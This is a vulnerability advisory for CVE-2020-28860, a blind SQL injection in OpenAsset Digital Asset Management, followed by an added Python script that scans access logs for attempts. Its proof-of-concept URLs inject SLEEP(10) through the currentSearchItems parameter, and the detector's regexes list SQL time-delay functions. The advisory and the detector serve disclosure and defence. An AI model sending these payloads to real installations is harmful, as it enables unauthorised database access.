OpenAsset Digital Asset Management SQL Injection

2020.12.14
Credit: Jack Misiura
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Title: Authenticated blind SQL injection (SQLi)
Product: OpenAsset Digital Asset Management by OpenAsset
Vendor Homepage: https://www.openasset.com/
Vulnerable Version: 12.0.19 (Cloud), 11.2.1 (On-premise)
Fixed Version: 12.0.23 (Cloud), 11.4.10 (On-premise)
CVE Number: CVE-2020-28860
Author: Jack Misiura from The Missing Link
Website: https://www.themissinglink.com.au

Timeline:
2020-11-14 Disclosed to Vendor
2020-12-04 Vendor releases final patches
2020-12-10 Publication

1. Vulnerability Description

The OpenAsset Digital Asset Management application was vulnerable to a blind SQL injection through the /AJAXPage/SearchResults endpoint, via the "currentSearchItems" parameter.

2. PoC

The following requests result in a delay of more than 10 seconds in the response, because the SLEEP(10) command is introduced into the SQL query:

https://example.com/AJAXPage/SearchResults?currentSearchItems=newUpload:0=11)%20AND%20(SELECT%20SLEEP(10))=1%23
https://example.com/AJAXPage/SearchResults?currentSearchItems=album%3A1=196)%20AND%20(SELECT+SLEEP(10)=1)%23

3. Solution

The vendor provides an updated on-premise version (11.4.10), which should be installed immediately. If using the cloud version, the vendor has already updated it.

4. Advisory URL

https://www.themissinglink.com.au/security-advisories
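Because the injection is time-based, exploitation attempts against this endpoint leave two traces in web-server access logs: a SLEEP()-style function and comment terminator inside the currentSearchItems parameter, and an unusually slow response. The following detection script is an added example, not part of this advisory or of OpenAsset; it assumes an Apache combined log format with the response time in seconds appended (the %T directive), uses constructed sample lines that mirror the advisory's PoC requests, and treats 8 seconds as the slow-response threshold (an assumption to tune per deployment).

```python
"""Flag time-based blind SQL injection attempts against /AJAXPage/SearchResults
in access logs. Added example; log format and threshold are assumptions."""
import re
from urllib.parse import urlsplit, parse_qs

TARGET_PATH = "/AJAXPage/SearchResults"   # endpoint named in the advisory
PARAM = "currentSearchItems"              # parameter named in the advisory
SLOW_SECONDS = 8                          # assumption: normal searches finish well under this

# Constructed sample lines: Apache combined format plus "%T" (response seconds).
SAMPLE_LOG = """\
203.0.113.5 - alice [10/Dec/2020:10:01:02 +0000] "GET /AJAXPage/SearchResults?currentSearchItems=album%3A1 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 0
203.0.113.5 - alice [10/Dec/2020:10:01:20 +0000] "GET /AJAXPage/SearchResults?currentSearchItems=newUpload:0=11)%20AND%20(SELECT%20SLEEP(10))=1%23 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 10
203.0.113.5 - alice [10/Dec/2020:10:01:35 +0000] "GET /AJAXPage/SearchResults?currentSearchItems=album%3A1=196)%20AND%20(SELECT+SLEEP(10)=1)%23 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 11
198.51.100.7 - bob [10/Dec/2020:10:02:00 +0000] "GET /AJAXPage/Other?x=1 HTTP/1.1" 200 100 "-" "curl/7.64" 0
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "[^"]*" (?P<secs>\d+)$'
)

# Indicators checked on the URL-decoded parameter value.
TIME_FUNC_RE = re.compile(r'\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\b', re.I)
COMMENT_RE = re.compile(r'(#|--\s|/\*)')          # terminators that discard the rest of the query
GLUE_RE = re.compile(r'\)\s*(and|or)\s*\(', re.I)  # ") AND (" style injected predicate


def indicators(value: str) -> list:
    """Return the list of injection indicators found in one decoded parameter value."""
    reasons = []
    if TIME_FUNC_RE.search(value):
        reasons.append("time-delay function")
    if COMMENT_RE.search(value):
        reasons.append("comment terminator")
    if GLUE_RE.search(value):
        reasons.append("injected boolean predicate")
    return reasons


def analyze(log_text: str) -> list:
    """Return one finding per suspicious request to the vulnerable endpoint."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue                       # not in the assumed log format
        parts = urlsplit(m["target"])      # %23 stays encoded, so no fragment split
        if parts.path != TARGET_PATH:
            continue
        values = parse_qs(parts.query).get(PARAM, [])   # decodes %20, + and %23
        reasons = []
        for value in values:
            reasons += indicators(value)
        secs = int(m["secs"])
        if secs >= SLOW_SECONDS:
            reasons.append(f"response took {secs}s")
        if reasons:
            findings.append({"line": lineno, "ip": m["ip"], "user": m["user"],
                             "values": values, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(f"line {finding['line']}: {finding['ip']} ({finding['user']}) "
              f"-> {', '.join(finding['reasons'])}")
```

The slow-response check is kept separate from the payload patterns on purpose: a padded or differently cased payload may slip past the regexes, while a burst of 10-second responses on an endpoint that normally answers instantly is hard to disguise. Both PoC lines in the sample produce a finding; the benign search and the request to another path do not.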


Copyright 2021, cxsecurity.com